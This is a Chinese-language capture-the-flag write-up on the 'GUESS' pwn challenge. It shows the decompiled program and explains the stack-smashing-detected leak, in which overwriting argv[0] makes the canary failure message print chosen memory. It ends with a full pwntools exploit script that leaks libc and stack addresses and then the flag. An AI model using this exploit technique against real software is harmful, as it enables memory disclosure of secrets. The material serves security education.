首先 查看保护

开启了 canary，NX   64位程序

ida查看程序

__int64 __fastcall main(__int64 a1, char **a2, char **a3)

{

  __WAIT_STATUS stat_loc; // [rsp+14h] [rbp-8Ch]

  int v5; // [rsp+1Ch] [rbp-84h]

  __int64 v6; // [rsp+20h] [rbp-80h]

  __int64 v7; // [rsp+28h] [rbp-78h]

  char buf; // [rsp+30h] [rbp-70h]

  char s2; // [rsp+60h] [rbp-40h]

  unsigned __int64 v10; // [rsp+98h] [rbp-8h]

  v10 = __readfsqword(0x28u);

  v7 = 3LL;

  LODWORD(stat_loc.__uptr) = 0;

  v6 = 0LL;

  sub_4009A6(a1, a2, a3);

  HIDWORD(stat_loc.__iptr) = open("./flag.txt", 0, a2);

  if ( HIDWORD(stat_loc.__iptr) == -1 )

  {

    perror("./flag.txt");

    _exit(-1);

  }

  read(SHIDWORD(stat_loc.__iptr), &buf, 0x30uLL);

  close(SHIDWORD(stat_loc.__iptr));

  puts("This is GUESS FLAG CHALLENGE!");

  while ( 1 )

  {

    if ( v6 >= v7 )

    {

      puts("you have no sense... bye :-) ");

      return 0LL;

    }

    v5 = sub_400A11();

    if ( !v5 )

      break;

    ++v6;

    wait((__WAIT_STATUS)&stat_loc);

  }

  puts("Please type your guessing flag");

  gets(&s2);

  if ( !strcmp(&buf, &s2) )

    puts("You must have great six sense!!!! :-o ");

  else

    puts("You should take more effort to get six sence, and one more challenge!!");

  return 0LL;

}

首先是将flag.txt读入到buf中

这里有一个get 可以进行溢出

我们知道开启canary后 如果溢出将canary覆盖掉的话就会进入__stack_chk_fai 这个函数

看一下这个函数的源码

void__attribute__ ((noreturn)) __stack_chk_fail (void)

{

__fortify_fail ("stack smashing detected");

}

void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)

{

  /* The loop is added only to keep gcc happy.  */

  while (1)

    __libc_message (2, "*** %s ***: %s terminated\n", msg, __libc_argv[0] ?: "<unknown>");

}

看到函数中会将 __libc_argv[0]输出  如果__libc_argv[0]指向的是存储flag.txt那个buf的位置呢？  就会把buf输出出来

这就是 stack smashing的原理   通过覆盖__libc_argv[0]的内容通过canary保护报错信息将我们覆盖的内容输出出来

这里就是触发了canary保护 输出了

*** stack smashing detected ***: ./GUESS terminated

首先思考第一个问题

如何覆盖argv[0]这个变量？

可以通过gdb调试先找到我们输入地方的地址 然后再找到argv的地址 这样就可以计算两者之间的偏移 

先找argv的地址，在上边那个图中可以看到 argv[0]  输出的是 “./GUESS”

这是指的程序文件，我们可以用gdb进行调试 断点下在main函数入口  指向文件位置那个就是argv[0]的地址

也可以直接通过 p 命令

然后就是 我们输入的地址 也就是s2的地址

可以将断点下在call get这个位置

可以看到s2是在rbp-0x40的位置

那么偏移就有了

下一个问题

我们如何让argv[0]指向存储flag的buf位置呢？

首先说一个environ

environ是libc中存储栈地址的一个变量  我们可以泄露libc地址然后算出environ的地址 然后算出flag和environ的偏移 就可以将flag通过触发cancry报错出来

存flag的地址和上边s2一样方法算出来

environ可以通过给在environ这下一个断点

就得到environ的地址了 那么 flag和environ的偏移就可以算了

from pwn import *

from LibcSearcher import *

sh = process('./GUESS')

#sh = remote('node3.buuoj.cn',29890)

elf = ELF('./GUESS')

puts_got = elf.got['puts']

print 'puts_got='+p64(puts_got)

def stackoverflow(payload):

  sh.sendlineafter('Please type your guessing flag',payload)

stackoverflow('a'*0x128 + p64(puts_got))

sh.recvuntil('stack smashing detected ***: ')

puts_addr = u64(sh.recv(6).ljust(8,'\x00'))

print 'puts_addr='+hex(puts_addr)

libc = LibcSearcher('puts',puts_addr)

libc_base = puts_addr - libc.dump('puts')

environ_addr = libc_base + libc.dump('__environ')

print 'environ_addr='+hex(environ_addr)

stackoverflow('a'*0x128 + p64(environ_addr))

sh.recvuntil('stack smashing detected ***: ')

stack_addr = u64(sh.recv(6).ljust(8,'\x00'))

print 'stack_addr'+hex(stack_addr)

flag_addr = stack_addr - 0x168

print 'flag_addr=',hex(flag_addr)

stackoverflow('a'*0x128 + p64(flag_addr))

sh.interactive()